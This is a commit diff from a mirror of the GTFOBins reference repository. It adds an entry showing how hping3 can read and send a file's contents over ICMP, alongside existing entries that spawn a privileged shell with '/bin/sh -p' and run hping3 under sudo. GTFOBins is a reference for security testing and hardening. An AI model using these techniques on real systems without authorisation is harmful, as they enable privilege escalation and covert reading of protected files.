mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 02:38:43 +01:00 
			
		
		
		
	Fix file-read with hping3
This commit is contained in:
		@@ -8,6 +8,11 @@ functions:
 | 
			
		||||
    - code: |
 | 
			
		||||
        ./hping3
 | 
			
		||||
        /bin/sh -p
 | 
			
		||||
  file-read:
 | 
			
		||||
    - description: It is possible to send specific file contents if hping3 has sufficient permission.
 | 
			
		||||
    - code: |
 | 
			
		||||
        hping3 --icmp 127.0.0.1 --listen --signature --safe
 | 
			
		||||
        hping3 --icmp 127.0.0.1 --d 100 --c 2 --sign signature --file ./file.txt
 | 
			
		||||
  sudo:
 | 
			
		||||
    - code: |
 | 
			
		||||
        sudo hping3
 | 
			
		||||
 
 | 
			
		||||
		Reference in New Issue
	
	Block a user